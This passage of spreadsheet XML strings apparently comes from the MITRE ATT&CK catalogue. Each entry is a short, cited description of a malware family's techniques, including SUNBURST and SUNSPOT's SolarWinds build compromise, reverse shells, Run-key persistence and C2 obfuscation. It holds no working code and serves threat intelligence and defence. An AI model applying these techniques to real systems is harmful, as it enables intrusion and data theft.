  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has the capability to stop processes and services.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has collected system name, OS version, adapter information, memory usage, and disk information from a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can enumerate open ports on a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has collected the username from a victim machine.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has the capability to enumerate services.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has used HTTP and HTTPS for C2 communications.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) can open a command line to execute commands.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOTHFULMEDIA](https://attack.mitre.org/software/S0533) has created a service on victim machines named "TaskFrame" to establish persistence.(Citation: CISA MAR SLOTHFULMEDIA October 2020)</t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) uses cloud based services for C2.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) downloads additional payloads.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) collects and sends system information to its C2.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) establishes persistence through a Registry Run key.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) encrypts C2 traffic using AES with a static key.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) communicates with its C2 server over HTTP.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[SNUGRIDE](https://attack.mitre.org/software/S0159) is capable of executing commands and spawning a reverse shell.(Citation: FireEye APT10 April 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of enumerating application windows.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) communicates via DNS for C2.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of enumerating and manipulating files and directories.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of modifying the Registry.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[SOUNDBITE](https://attack.mitre.org/software/S0157) is capable of gathering system information.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>Data [SPACESHIP](https://attack.mitre.org/software/S0035) copies to the staging area is compressed with zlib. Bytes are rotated by four positions and XOR'ed with 0x23.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) copies staged data to removable drives when they are inserted into the system.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) identifies files and directories for collection by searching for specific file extensions or file modification time.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) identifies files with certain extensions and copies them to a directory in the user's profile.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SPACESHIP](https://attack.mitre.org/software/S0035) achieves persistence by creating a shortcut in the current user's Startup folder.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has scripts that are responsible for deobfuscating additional scripts.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has used been observed deleting scripts once used.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) can make a direct SQL connection to a Microsoft database controlled by the attackers, retrieve an item from the bindata table, then write and execute the file on disk.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) relies on users clicking on an embedded image to execute the scripts.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has used a character insertion obfuscation technique, making the script appear to contain Chinese characters.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has used PowerShell to create a Meterpreter session.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has created scheduled tasks in &lt;code&gt;%appdata%\Roaming\Microsoft\Templates\&lt;/code&gt;.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) has used SQL to execute JavaScript and VB scripts on the host system.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) was digitally signed by SolarWinds from March - May 2020.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used DNS for C2 traffic designed to mimic normal SolarWinds API communications.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected information from a compromised host.(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) attempted to disable software security services following checks against a FNV-1a + XOR hashed hardcoded blocklist.(Citation: FireEye SUNBURST Additional Details Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) dynamically resolved C2 infrastructure for randomly-generated subdomains within a parent domain.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) had a command to delete files.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) had commands to enumerate files and directories.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) created an Image File Execution Options (IFEO) Debugger registry value for the process &lt;code&gt;dllhost.exe&lt;/code&gt; to trigger the installation of [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNBURST](https://attack.mitre.org/software/S0559) source code used generic variable names and pre-obfuscated strings, and was likely sanitized of developer comments before being added to [SUNSPOT](https://attack.mitre.org/software/S0562).(Citation: CrowdStrike SUNSPOT Implant January 2021) </t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) removed IFEO values to clean up traces of execution.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) delivered different payloads, including [TEARDROP](https://attack.mitre.org/software/S0560) in at least one instance.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) added junk bytes to its C2 over HTTP.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNBURST](https://attack.mitre.org/software/S0559) created VBScripts that were named after existing services or folders to blend into legitimate activities.(Citation: Microsoft Deep Dive Solorigate January 2021) </t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) had commands that allow an attacker to write or delete registry keys, and was observed stopping services by setting their &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\services\\[service_name]\\Start&lt;/code&gt; registry entries to value 4.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020) It also deleted previously-created Image File Execution Options (IFEO) Debugger registry values and registry keys related to HTTP proxy to clean up traces of its activity.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) strings were compressed and encoded in Base64.(Citation: Microsoft Analyzing Solorigate Dec 2020) [SUNBURST](https://attack.mitre.org/software/S0559) also obfuscated collected system information using a FNV-1a + XOR algorithm.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected a list of process names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) masqueraded its network traffic as the Orion Improvement Program (OIP) protocol.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected the registry value &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid&lt;/code&gt; from compromised hosts.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNBURST](https://attack.mitre.org/software/S0559) used Rundll32 to execute payloads.(Citation: Microsoft Deep Dive Solorigate January 2021) </t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) checked for a variety of antivirus/endpoint detection agents prior to execution.(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: FireEye SUNBURST Additional Details Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used Base64 encoding in its C2 traffic.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) C2 data attempted to appear as benign XML related to .NET assemblies or as a faux JSON blob.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: FireEye SUNBURST Additional Details Dec 2020)(Citation: Symantec Sunburst Sending Data January 2021)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) encrypted C2 traffic using a single-byte-XOR cipher.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) checked the domain name of the compromised host to verify it was running in a real environment.(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected hostname, OS version, and device uptime.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected all network interface MAC addresses that are up and not loopback devices, as well as IP address, DHCP configuration, and domain information.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected the username from a compromised host.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) collected a list of service names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) remained dormant after initial access for a period of up to two weeks.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used VBScripts to initiate the execution of payloads.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) communicated via HTTP GET or HTTP POST requests to third party servers for C2.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNBURST](https://attack.mitre.org/software/S0559) used the WMI query &lt;code&gt;Select * From Win32_SystemDriver&lt;/code&gt; to retrieve a driver listing.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) modified its security token to grants itself debugging privileges by adding &lt;code&gt;SeDebugPrivilege&lt;/code&gt;.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) malware was designed and used to insert [SUNBURST](https://attack.mitre.org/software/S0559) into software builds of the SolarWinds Orion IT management product.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) decrypts [SUNBURST](https://attack.mitre.org/software/S0559), which was stored in AES128-CBC encrypted blobs.(Citation: CrowdStrike SUNSPOT Implant January 2021)  </t>
  </si>
  <si>
    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) only replaces SolarWinds Orion source code if the MD5 checksums of both the original source code file and backdoored replacement source code match hardcoded values.(Citation: CrowdStrike SUNSPOT Implant January 2021) </t>
  </si>
  <si>
    <t>Following the successful injection of [SUNBURST](https://attack.mitre.org/software/S0559), [SUNSPOT](https://attack.mitre.org/software/S0562) deleted a temporary file it created named &lt;code&gt;InventoryManager.bk&lt;/code&gt; after restoring the original SolarWinds Orion source code to the software library.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) enumerated the Orion software Visual Studio solution directory path.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) was identified on disk with a filename of &lt;code&gt;taskhostsvc.exe&lt;/code&gt; and it created an encrypted log file at &lt;code&gt;C:\Windows\Temp\vmware-vmdmp.log&lt;/code&gt;.(Citation: CrowdStrike SUNSPOT Implant January 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[SUNSPOT](https://attack.mitre.org/software/S0562) used Windows API functions such as &lt;code&gt;MoveFileEx&lt;/code&gt; and &lt;code&gt;NtQueryInformationProcess&lt;/code&gt; as part of the [SUNBURST](https://attack.mitre.org/software/S0559) injection process.(Citation: CrowdStrike SUNSPOT Implant January 2021) </t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) encrypted log entries it collected with the stream cipher RC4 using a hard-coded key. It also uses AES128-CBC encrypted blobs for [SUNBURST](https://attack.mitre.org/software/S0559) source code and data extracted from the SolarWinds Orion &lt;MsBuild.exe&lt;/code&gt; process.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) monitored running processes for instances of &lt;code&gt;MsBuild.exe&lt;/code&gt; by hashing the name of each running process and comparing it to the corresponding value &lt;code&gt;0x53D525&lt;/code&gt;. It also extracted command-line arguments and individual arguments from the running &lt;code&gt;MsBuild.exe&lt;/code&gt; process to identify the directory path of the Orion software Visual Studio solution.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>Stored Data Manipulation</t>
  </si>
  <si>
    <t>[SUNSPOT](https://attack.mitre.org/software/S0562) created a copy of the SolarWinds Orion software source file with a &lt;code&gt;.bk&lt;/code&gt; extension to backup the original content, wrote [SUNBURST](https://attack.mitre.org/software/S0559) using the same filename but with a &lt;code&gt;.tmp&lt;/code&gt; extension, and then moved [SUNBURST](https://attack.mitre.org/software/S0559) using &lt;code&gt;MoveFileEx&lt;/code&gt; to the original filename with a &lt;code&gt;.cs&lt;/code&gt; extension so it could be compiled within Orion software.(Citation: CrowdStrike SUNSPOT Implant January 2021)</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability (CVE-2020-10148).(Citation: Carnegie Mellon University Supernova Dec 2020)(Citation: Splunk Supernova Jan 2021)</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) has masqueraded as a legitimate SolarWinds DLL.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020)</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) contained Base64-encoded strings.(Citation: CISA Supernova Jan 2021)</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) had to receive an HTTP GET request containing a specific set of parameters in order to execute.(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: Unit42 SUPERNOVA Dec 2020)</t>
  </si>
  <si>
    <t>[SUPERNOVA](https://attack.mitre.org/software/S0578) is a Web shell.(Citation: Unit42 SUPERNOVA Dec 2020)(Citation: Guidepoint SUPERNOVA Dec 2020)(Citation: CISA Supernova Jan 2021)</t>
  </si>
  <si>
    <t>Network Device Authentication</t>
  </si>
  <si>
    <t>[SYNful Knock](https://attack.mitre.org/software/S0519) has the capability to add its own custom backdoor password when it modifies the operating system of the affected network device.(Citation: FireEye - Synful Knock)</t>
  </si>
  <si>
    <t>Patch System Image</t>
  </si>
  <si>
    <t>[SYNful Knock](https://attack.mitre.org/software/S0519) is malware that is inserted into a network device by patching the operating system image.(Citation: FireEye - Synful Knock)(Citation: Cisco Synful Knock Evolution)</t>
  </si>
  <si>
    <t>[SYNful Knock](https://attack.mitre.org/software/S0519) can be sent instructions via special packets to change its functionality. Code for new functionality can be included in these messages.(Citation: FireEye - Synful Knock)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use FTP in C2 communications.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has been executed by luring victims to open malicious e-mail attachments.(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use [Tasklist](https://attack.mitre.org/software/S0057) to list running processes.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to use [Systeminfo](https://attack.mitre.org/software/S0096) to identify system information.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[SYSCON](https://attack.mitre.org/software/S0464) has the ability to execute commands through [cmd](https://attack.mitre.org/software/S0106) on a compromised host.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) contains UAC bypass code for both 32- and 64-bit systems.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>Some [Sakula](https://attack.mitre.org/software/S0074) samples use cmd.exe to delete temporary files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) has the capability to download files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) uses single-byte XOR obfuscation to obfuscate many of its files.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>Most [Sakula](https://attack.mitre.org/software/S0074) samples maintain persistence by setting the Registry Run key &lt;code&gt;SOFTWARE\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; in the HKLM or HKCU hive, with the Registry value and file name varying by sample.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) calls cmd.exe to run various DLL files via rundll32.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) encodes C2 traffic with single-byte XOR keys.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) uses HTTP for C2.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[Sakula](https://attack.mitre.org/software/S0074) calls cmd.exe to run various DLL files via rundll32 and also to perform file cleanup. [Sakula](https://attack.mitre.org/software/S0074) also has the capability to invoke a reverse shell.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>Some [Sakula](https://attack.mitre.org/software/S0074) samples install themselves as services for persistence by calling WinExec with the &lt;code&gt;net start&lt;/code&gt; argument.(Citation: Dell Sakula)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) has used garbage code to pad some of its malware components.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) encrypts victim files using RSA-2048 encryption and demands a ransom be paid in Bitcoin to decrypt those files.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) has been seen deleting its own files and payloads to make analysis of the attack more difficult.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) has been seen using AES or DES to encrypt payloads and payload components.(Citation: Sophos SamSam Apr 2018)(Citation: Talos SamSam Jan 2018)</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) uses custom batch scripts to execute some of its components.(Citation: Sophos SamSam Apr 2018)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) compressed data with zlib prior to sending it over C2.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) can securely delete files, including deleting itself from the victim.(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of uploading and downloading files.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>Some [SeaDuke](https://attack.mitre.org/software/S0053) samples have a module to use pass the ticket with Kerberos for authentication.(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) uses a module to execute Mimikatz with PowerShell to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003).(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of persisting via the Registry Run key or a .lnk file stored in the Startup directory.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>Some [SeaDuke](https://attack.mitre.org/software/S0053) samples have a module to extract email from Microsoft Exchange servers using compromised credentials.(Citation: Symantec Seaduke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of persisting via a .lnk file stored in the Startup directory.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) has been packed with the UPX packer.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) C2 traffic is base64-encoded.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) C2 traffic has been encrypted with RC4 and AES.(Citation: Mandiant No Easy Breach)(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) is capable of executing commands.(Citation: Unit 42 SeaDuke 2015)</t>
  </si>
  <si>
    <t>[SeaDuke](https://attack.mitre.org/software/S0053) uses an event filter in WMI code to execute a previously dropped executable shortly after system startup.(Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has a command to delete a specified file.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has the capability to identify the drive type on a victim.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has a command to download additional files.(Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has masqueraded as a service called "SaSaut" with a display name of "System Authorization Service" in an apparent attempt to masquerade as a legitimate service.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) obfuscates configuration data.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) has a command to perform a process listing.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) creates a Registry entry to ensure infection after reboot under &lt;code&gt;HKLM\Software\Microsoft\Windows\currentVersion\Run&lt;/code&gt;.(Citation: McAfee Oceansalt Oct 2018)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) uses HTTP for C2 communications.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) uses cmd.exe to create a reverse shell on the infected endpoint.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[Seasalt](https://attack.mitre.org/software/S0345) is capable of installing itself as a service.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) may set up a reverse SSH tunnel to give the attacker access to services running on the victim, such as RDP.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has a module to delete itself from the infected machine.(Citation: Proofpoint TA505 Jan 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) may download additional files to execute.(Citation: Proofpoint TA505 Jan 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has created a new user and added it to the "Remote Desktop Users" and "Administrators" groups.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has the ability to execute a PowerShell script to get information from the infected host.(Citation: Trend Micro TA505 June 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) may attempt to establish persistence via the &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt; run key.(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) has commands for adding a remote desktop user and sending RDP traffic to the attacker through a reverse SSH tunnel.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) contains a module for downloading and executing DLLs that leverages &lt;code&gt;rundll32.exe&lt;/code&gt;.(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) contains modules that will use [schtasks](https://attack.mitre.org/software/S0111) to carry out malicious operations.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) will attempt to enumerate Windows version and system architecture.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) will attempt to enumerate the username of the victim.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) uses HTTP for C2.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) can execute shell commands against [cmd](https://attack.mitre.org/software/S0106).(Citation: Proofpoint TA505 Jan 2019)(Citation: Deep Instinct TA505 Apr 2019)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has used DNS tunneling for C2 communications.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has decrypted a binary blob to start execution.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) uses a DGA that is based on the day of the month for C2 servers.(Citation: Securelist ShadowPad Aug 2017)(Citation: Kaspersky ShadowPad Aug 2017)(Citation: FireEye APT41 Aug 2019)</t>
  </si>
  <si>
    <t>[ShadowPad](https://attack.mitre.org/software/S0596) has injected a DLL into svchost.exe.(Citation: Kaspersky ShadowPad Aug 2017)</t>
  </si>
  <si>
